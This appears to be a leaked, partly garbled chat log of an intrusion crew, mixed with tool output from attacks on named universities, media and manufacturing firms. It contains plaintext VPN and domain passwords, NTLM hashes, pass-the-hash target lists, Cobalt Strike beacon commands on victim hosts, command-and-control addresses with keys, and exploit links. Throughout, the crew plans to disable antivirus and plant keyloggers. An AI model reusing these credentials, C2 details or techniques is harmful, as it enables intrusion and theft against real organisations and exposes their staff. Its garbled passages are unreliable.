[*] 172.17.202.61:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.62:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.63:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.64:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.65:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.66:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.67:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.68:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.70:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.71:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.72:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.74:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.75:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.76:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.82:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{69662d727265-7265-0079-0000000000000000}) (authentication domain:R-FIERY)
[*] 172.17.202.77:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.78:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.81:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 172.17.202.187:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[+] 172.17.202.187:445 - Host is running VxWorks (workgroup:MSHOME)
[*] 172.17.202.84:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{69662d70-7265-0079-0000-000000000000) (authentication domain:P-FIERY)
[*] 172.17.202.84:445 - Host could not be identified: Windows 6.1 (Samba 4.4.6)

Anyone who has problems with dedicas - come to me:sunglasses:for questions to @user8 he is a guru in this, I'll send you a scan of the network UserName: alangvardt Password: Crimson24! Domain: SNU`
Valid account, log in under it and download the client for vpn``

https://204.126.2.44
UserName: alangvardt Password: Crimson24! Domain: SNU
userName: conmille Password: #Spr1gTym Domain: SNU
userName: hculbert Password: /Roma/1974/ Domain: SNU
userName: dtompkin Password: HobbyLobby2019! Domain: SNU



[!!!] Found Active Directory creds
[+] AD creds :@atlantis.ad.snu.edu

[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 97, 'name': 'JeneSys', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '172.16.100.88'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 97, 'name': 'Science Lab', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '172.17.8.254'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 1, 'name': 'Laserfiche Remote Access', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'laserfiche.snu.edu'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 290, 'name': 'tracdat1', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://tracdat.snu.edu/tracdat/faces/assessment/unit_planning/assessmentPlan.xhtml'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 312, 'name': 'TracDat', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'tracdat.snu.edu/tracdat/'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 312, 'name': 'Laserfiche', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://laserfiche.snu.edu/Laserfiche/Login.aspx?db=SNU'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 235, 'name': 'Vdrive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'http://atlantis.ad.snu.edu/'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 275, 'name': 'Network Drives', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'atlantis.snu.edu'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 358, 'name': 'snu', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'snu.edu'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Optimus', 'username': 'brent', 'password': 'f@lc0n95', 'service': 'SSH', 'host': 'optimus.csne.snu.edu'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 416, 'name': 'TracDat', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://tracdat.snu.edu/tracdat/'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 395, 'name': 'Tracdat', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://tracdat.snu.edu/tracdat/'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 395, 'name': 'Tracdat 2', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'https://tracdat.snu.edu/tracdat'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 395, 'name': 'Tracdat 3', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'tracdat.snu.edu/tracdat/faces/login.xhtml?fromLogout=true'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 407, 'name': 'V drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'atlantis.ad.snu.edu'}
```user9user8Acquired.
```
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
``Taken.
23.106.160.86
https://raills.com
-
104.194.8.114:61660
bQerl9O7K5s9pKDlz2PF3SNxtEIoIN9AUAL3 out of 4 sorted out?+@user8 there you got 2 more sessions from that netchat - orenco.com.telecomlabsinc.com input coba, went sessions first took 2 did not take 3 took
173.234.155.75
https://likenic.com
-
104.243.40.126:38542
JI07HSLOl2MtjxWe0UhqpolvHLJPZCAcL6M
``````
204.16.247.229
https://instwp.com
-
199.127.60.227:52742
SP7PeWVtkJcPZlbXZOSlVpK4g61drpgJlUZ
``````
23.106.160.86
https://raills.com
-
104.194.8.114:61660
bQerl9O7K5s9pKDlz2PF3SNxtEIoIN9AUAL
``````
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
``https pick up yourselves, 4 pieces ready, I'll give them here and you disassemble them yourself, just write down who picked up what on the new sootv pulling from the input above the grid in the work to finish on the old and another announcement, you koba update http://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon input coba```
199.127.60.67:20656
hPElm480XYW7rRX0fS7wSZU6owX4MJuSNey
``https://www.exploit-db.com/exploits/48537ну in general you should look for additional vector and additional task to find this case) in the rep lies only in the rep and the folder in the folder which he opens lies in the folder ëèosalvot here pay attention to the gif
https://github.com/danigargu/CVE-2020-0796
```:thinking:but i need to look and there is another option with rce)like on the ms17-010?
for goost need a session, no? and one more thing, about dead spots, did you do scans on the smbgost? and today put the buildda ok, let's do a story there and gather information on the offsets avera)
but i was there yesterday, i don't know how to check it but i don't know if it's critical, the scale is small and looking for ways to unscramble it) ok then solve the problem with EDR on all servers there are pinged +- 100-80252 machines without a server how many users?
0 Objects returned
are there any trusts? 20 pcs.... seriously?)file already if there is not enough buffer length let's make it clear at once that if it fits in the message - write in the message ``
DC:
	ITCMA-FILE03.ITC.LOCAL 10.10.0.22
	ITCMA-FILE02.ITC.LOCAL 10.0.0.38
	ASITC-DC01.ITC.LOCAL 192.168.0.221
	ITC-DC-SVR01.ITC.LOCAL 10.0.0.14

RDS:
	ITCMA-RDS01.ITC.LOCAL 10.0.0.8
	ITCMA-RDS-SVR01.ITC.LOCAL 10.0.0.6

Web Server:
	ITC-SHIP01.ITC.LOCAL 10.0.0.18
	ITC-APP01.ITC.LOCAL 10.0.0.17
	ITC-SQL01.ITC.LOCAL 10.0.0.16
	ITC-PLM01.ITC.LOCAL 10.0.0.23

Terminal:
	ITCMA-APP02.ITC.LOCAL 10.0.0.79
	ASITC-APP01.ITC.LOCAL 192.168.0.220
	ASITC-FILE01.ITC.LOCAL 192.168.0.227
	ITC-PLM02.ITC.LOCAL 192.168.0.224
	ITCMA-PDM01.ITC.LOCAL 10.0.0.165
	ITCMA-Print-SVR01.ITC.LOCAL 10.0.0.7

SQL:
	ITCMA-SQL02.ITC.LOCAL 10.0.0.81

Exchange:
	ITCMA-FILE01.ITC.LOCAL 10.0.0.39

Disabled:
	ITCMA-MITS01.ITC.LOCAL 100% loss
	ITCMA-PDM02.ITC.LOCAL 100% loss
How many servers are there in total? If there are not many you can try to shut down AV by hand, collect analytics on this and we will start with the number of servers. These are most likely the most critical of some @user3 found malware and bitdefender on itc-us.com servers had 4 servers? Or am I confused with another one?
Using GPO for Deployment

To install SecureAnywhere using GPO, you should have experience with Microsoft's Active Directory and the GPO editor.

You can also watch a video on how to use GPOs at How to Deploy Using Group Policy - SecureAnywhere Business.

To install SecureAnywhere using GPOs:

    From the following location, download the SecureAnywhere MSI installer to a network share:

    http://anywhere.webrootcloudav.com/zerol/wsasme.msi

    Downloading the file makes it accessible to all endpoints on which you will deploy SecureAnywhere.

    Go to the server that is the domain controller for the deployment group.
    Open the GPO editor on the domain controller and create a policy for the deployment group.
    Assign SecureAnywhere to all endpoints that belong to the Organizational Unit where the Group Policy is created.

    SecureAnywhere installs on the endpoints in the group when they restart.

``Two hours we work with these, then there will be new sessionsGood afternoonits-us.com - have
pkgprod.com - are what about the sessions?:flag_il:Good morning,good night to you allAll right,then we start at 3, the amount of work for tomorrow does not changeI only get out of bed at 14 I think that from now until tonight you have time to prepare the networks for the buildI do not understand is it convenient for you and you sleep before that time?can even earlierWhy at 14? Write to the group on the current networks status tomorrow we need to have two networks ready for the buildtomorrow by 14:00 still an hour working videli a shortcut on your desktop on the web, something to sol ...they seem to have such a system, but it also needs creeds)))) I'm not saying that it does not work at all do not save access to avs in browsers, but in password storage systems? keylogger koba* in sprouselaw from malware account keylogger and got it worked at all? keylogger koba itself is not the most working option in the working except for keylogger, it turns out?
they don't save the credentials from av in chrome anywhere
keylogger put today on a bunch of machines, as a result keystrokes - roam-away-field as an option - access only in working hours I've already gone through a shitload of machines (where admins sit), no access from anywhere, it seems there are backups going to the cloud if admin not found How to look for cmd version disable on servers, etc in other networks? no about that we did not find the av, admin
or do you mean the other? build what build?) today we have time to put the build? I have already offed the session
this is the account for the ASP.NET, most likely only used when installing it or something like that no user
[-] 10.7.0.199:445 - Account lockout detected on 'ASPNET', skipping this user.

The account is disabled. What is it? ASPNET is blocked everywhere (I've taken dumps everywhere)
no yes(
found another LA and microadmin
check them out
```

ASPNET:1005:aad3b435b51404eeaad3b435b51404ee:9ce556658be18cd8df47dbdb99bb3b32:::

	 * Username : rsantiagom
	 * Domain : CORP
	 * NTLM : 296ececefec7dda11a5a52a2a42a4217bb2bb
yes, in the process you still need to remove the hashes everywhere + these are the servers as I understand it? check everywhere we can move now
they are citrix hosts if i understand correctly
Checked the process at all and a couple of hashdumps removed
no yes and LA (most likely) everywhere the same(
```
pth .\Administrator 36906d0058d70ea02b5d8a81ee6e9144
 10.7.4.131
 10.7.5.196
 10.7.5.197
 10.7.5.38
 10.7.4.130
 10.7.5.41
 10.7.5.43
 10.7.4.45
 10.7.4.109
 10.7.4.47
 10.7.4.46
 10.7.5.37
 10.7.4.96
 10.7.5.146
 10.7.5.42
 10.7.5.147
 10.7.4.106
 10.7.4.107
 10.7.5.80
 10.7.4.72
 10.7.4.133
 10.7.4.134
 10.7.4.132
``was the mikehashdump taken off``?
corp.televisa.com.mx\gcastillom #hVbtYAI9buf
corp.televisa.com.mx\gemorenop #hVbtYAI9buf
corp.televisa.com.mx\jrortizc #hVbtYAI9buf
corp.televisa.com.mx\IPEREZJ #hVbtYAI9buf
```
it's weird, everyone's got the same fucking password + dll in place? ```
beacon> shell rundll32 C:\Windows\system32\mrtsvc.dll entryPoint
[*] Tasked beacon to run: rundll32 C:\Windows\system32\mrtsvc.dll entryPoint
[+] host called home, sent: 81 bytes
beacon> shell schtasks /query
[*] Tasked beacon to run: schtasks /query
[+] host called home, sent: 46 bytes
[+] received output:

Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 2/3/2021 1:00:00 PM Ready
ControlUp autoupdate#10514 2/3/2021 12:28:56 PM Ready
gpoAgentDeploy N/A Ready
Optimize Start Menu Cache Files-S-1-5-21 N/A Disabled
Optimize Start Menu Cache Files-S-1-5-21 N/A Ready


``Log from biconadai command to launch-fixed?
```
	corp.televisa.com.mx 10.7.5.196 SYSTEM * CORPKIOVDAPGM01
``LA''.
Teemo[SFE16537]pjfrancocru/16872|2021Feb03 21:05:28> shell net localgroup Administradores
[*] Tasked beacon to run: net localgroup Administradores
[+] host called home, sent: 61 bytes
[+] received output:
Nombre de alias Administradores
Comentario

Miembros

-------------------------------------------------------------------------------
Administrador
CORP\Domain Admins
CORP\EndPoint
CORP\pjfrancocru
CORP\SCMusr
CORP\SoporteDXC
Se ha completado el comando correctamente.

``you have YES? user9@tl1 add @user9 here i yanked it from the browser yesterday, i thought it would fit this from kerb?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=hGah3m4Ca2EBzcpg6) the creds are not valid (+there came?put the loadpokaem1 min@tl1 pulse session please://phanein.televisa.com.mx/vpn/logout.htmlb through the push configured then(Does not come to his mail on mail#1-done-crispregional-org what?the other one's in work i'm watching this one out of the corner of my eye while the other one's in work i'm waiting till it's on, when it's on i'll jump right away, i have everything ready, this is just a screen, is the VPN off in the domain?) as mantra dont forget sessions in slip everyone good night, then until tomorrow by 7 and go on vacation then finish tomorrow you are tough) so far the stats look like this
+ this is the domain where we are
TECHNISTONE.LOCAL - can't get through, no overlap of users and users/groups from other domains with rights
WI.RWP.COM is some kind of a dead domain, just wine 2003
```
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +

TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
	              

POLYREY.COM Quarantined
RESOPAL.GER Quarantined
```

found avs, backups, spheres and creeds to us region
left backups/spheres in europe
Symantec
 
    admin
    pRe1Udlp!


dcwas79.Wilsonart.com - vcenter
    
    fowlerh@wilsonart.com
    R3f1nn3j2!
``Give me a brief report on the work so that```
https://fordll.com
192.111.152.138:55764
JdbRe0n3UNkvgOdp4gDxbxTxD7g0ZrKnlygM
``All resurrected Keeping up to date Support is still not returning calls @user3 contacted support, waiting for a response again?)Our internet failed) 0.dead.forestriverinc.com What happened here? user5``
>sAMAccountName: TIMECLOCK41$
>operatingSystem: Windows 8.1 Pro
``put the server sabinet on the 445 portas I'll look at the rest, maybe I missed something there only 301 tachksts no? ok, it's a deal then I'll help you here as much as I can there + you work with me in the mouth? give 5 minutes now quickly sort out the servers and prepare it, it's not yet clear what the cost here how much? umm... i don't even see it, i'll re-scan it, it's a tool changer, i can't see the trusts file
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec25 20:05:02> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 105071 bytes
[+] received output:
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 WWDC1 192.168.0.228
 WWDC2 192.168.0.222

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec25 20:05:18> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 105066 bytes
[+] received output:
List of domain trusts:

    0: WATERWAY waterway.com (Forest tree root) (Primary Domain) (Native)
```
well not visible yet) no trusts? ```
WATERWAY\Quser pdiC1137qu!
WATERWAY\Administrator 1853Gators
.
waterway\ssuser pdiC1137ssrs!
WATERWAY\Fpuser pdiC1137fp!
````DA`
```
Administrator Applied blauer
datavault DBunte djarden
domainrestore gkeller mapusatera
mharper Quser SEnglert
ServerAdmin$ techpartners veeam_admin
```
.
``EA``
```
Administrator CSE domainrestore
mapusatera ResultsTech ServerAdmin$
I will first subdata on the domain then yank dxinx immediately here progress on the tasks but at least you will know that there is something nearby just do not get there if chet will find, most likely will be restrictet domain in another forest or something like thataga, there is a feeling that other networks should be where tonya 445po put a scan from the current subnet on /16 maskstrano, trusts were not and all servers) well in adcom they -42 total net small however `` ``
172.0.0.188:443
172.0.0.187:443
10.70.4.252:53
10.70.3.240:3389
10.70.3.240:139
10.70.3.236:53
10.70.3.114:3389
10.70.3.114:139
10.70.3.56:3389
10.70.3.56:139
10.70.1.100:3389
10.70.1.100:443
10.70.1.100:139
10.70.1.100:80
``Portscan on the computers that are visible (15 pcs) on these ports
```
21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100
``bad of course ... and then as if the account is abandoned, because there are no files it apparently only works through the web yes, this is in the plans to do nowbrazers no, but what is the current use there on the pc? in mssql you can put the brute force would be a, patched services mssql and so the same zerologon option? there are several such exploits, but I have not attracted it
and in sharp or c there is no them (and in c they are always fallen) ah, well, only 2020-0796vertical within the current pc) I do not understand a little bit what it means within vpe) within vredlere exploits? did not understand) I mean lpe -> vredlere smbghost, msf did not draw it tried? on gpp empty, but I have not collected the dictionary
because I haven't used the browser here)
and passwords are nowhere else in fschet by the way on gpp? collected from browsers? mm-hmm, so you can brute force without loca``on
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30

``Give me a password policy no? there are a few 2008da there are some servers lol)2003, hp? skilkerb there are no passwords in usersmm, but yes one...in usersm there is what? but it does not lada
MCLOUD-SH32-6.mgrmedu.com
```
your current one? ``He's a dense one,`` but he's not ``sharfinder.``
Global Group memberships *MCLOUD-PORTAL-PINSTU *MSSO-POHS363
                             *Domain Users
``Whether or not I run the tools from the toolkit, by the way, does it have any privileges? If output to a file - I throw in a new session - the files are there but the tools work?same) psinject? lazagne.exeadfind also kicked out the session after it worked out execute-assembly? you have coba attached? only windef in your processes which av? no luck yet
i couldn't find the credentials.
no user anywhere
sessions are dropped after you run any tools like sitbelt, etc.and what tools did you run?
beacon> shell net localgroup administrators
[*] Tasked beacon to run: net localgroup administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
mgrmedu\AWS Delegated Server Administrators
mgrmedu\Domain Admins
mgrmedu\M-DLGTD-SVR-ADM
Rapyder-admin
ssm-user
The command completed successfully.


beacon> shell net group "Domain admins" /dom
[*] Tasked beacon to run: net group "Domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain mgrmedu.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.


beacon> shell net group "Enterprise admins" /dom
[*] Tasked beacon to run: net group "Enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain mgrmedu.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.



Domain Controllers:

 Server Name IP Address
 ----------- ----------
 WIN-BA6SF1HOCKI 10.70.4.252
 WIN-QL5L2UP8A9V 10.70.3.236
``````
172.17.70.10 vSphere - HQ-VCENTER-2.evo.local - Summary
``````
walking isoutsource
https://172.17.70.52:8444 network monitoring
http://192.168.80.1/ Meraki Cisco
https://172.17.70.52:8443 unifi-network
I can't believe this is happening.+tout flylodem put the same shelsession droppedthe cartel assembly just noticed that the top of the whole line is his nameThe Pink Panthers cartel criminal thunderstorm like a stranger looking right into my soul (c) Looking for credits from the sphere and avv #wilsonart-com so far nothing...
of the current crits no admin, no vulnerability on ms17/netapi, at least on the servers, GPPP does not give anything, orb no quietly how are you doing? ok#alloypolymers-com preparing to close, divide themselves on both networking all hello, I will be late tonight and while I will not you work on #wilsonart-com and #alloypolymers-comok, good nighta, tomorrow by 6 to what time?good night to all thank you all for tonight) and until the end of the week for sure #wilsonart-com and tomorrow according to the plans of @user3 network for the closing join me
fast, coherent, accurateFirst I'll tell you that you're great, very good work give 10 minkyAndryukha we have a case, maybe close all the knights? + here all `missme.com` move on[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=KtrNZzD9bhmSBf9Th) Yes I'm watching the half eye ...[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=K3jwXPLpkFRXxPfm5) and I said that did not come[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=8wYFZdyroPrkL6ZbQ) Well personally you ask me, I do not do balimore, what's it to me? It's strange that the fix on the polzac, when the servers jumped the hell knows when@user4 ?) have not thought of that? you can already think that you can search for login through passwords vpnUsers you probably know ip vpn[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=iggYCy47Qf6fzWYEA) I'm what you have ad infos, you have dsink[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=nachfqHrSpAPeij9Z) and you?) then what do you mean by "accesses"? accesses above in the conf, no password and you can't find accesses from vpnA what's up with the polozack? what's up with vpn off?[ ](https://mediaeveryone.com/group/snpartners-com?msg=9DgDeXLzLH2H9aMgo) 1```
Shares for W088726121943:
	[--- Unreadable Shares ---]
		Caseys
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$
Shares for W08041912196:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W080419812194:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for MICSERVICE180:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for MICSERVICE160:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08041911194:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for TANNERFLANIGAN:
	[--- Unreadable Shares ---]
		IPC$
		NPI602973 (HP LaserJet 400 M401dne)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for MICSERVICE190:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08041910193:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08041911192:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for MICPARTS190:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08041912198:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08041912195:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for DESKTOP-0BOG84E:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for TOMA:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W0080419BERNIE:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for TROFFICE:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$
Shares for W08041912197:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ F$ G$
Shares for W08041911191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for CARPARTS190:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for DESKTOP-GAYLEN:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for CARSERVICE191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for CARSERVICE160:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for DESKTOP-UA05NRF:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for MARVGOTTFRIED:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for DESKTOP-4Q14G11:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for CARSERVICE180:
	[--- Unreadable Shares ---]
		IPC$
		TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W088726111912:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for CANDISOFFICE:
	[--- Unreadable Shares ---]
		IPC$
		Nics
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08872611192:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W088726121912:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$.
Shares for JASONS-HP:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for DEVSERVICE6:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726111913:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for NDLEADING-SHOP1:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872611191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W088726111910:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W088726121910:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872611197:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872612192:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121928:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121929:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121911:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121932:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872612191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121931:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872611193:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872612193:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08987712191:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121935:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726111915:
	[--- Unreadable Shares ---]
		IPC$
		Upstairs Printer
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08872612195:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08872610195:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872612196:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726111914:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872610192:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$.
Shares for W08872612197:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W088726121945:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W08987711197:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08872611194:
	[--- Unreadable Shares ---]
		IPC$
		nic
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W0887260319CP:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W0987711195:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
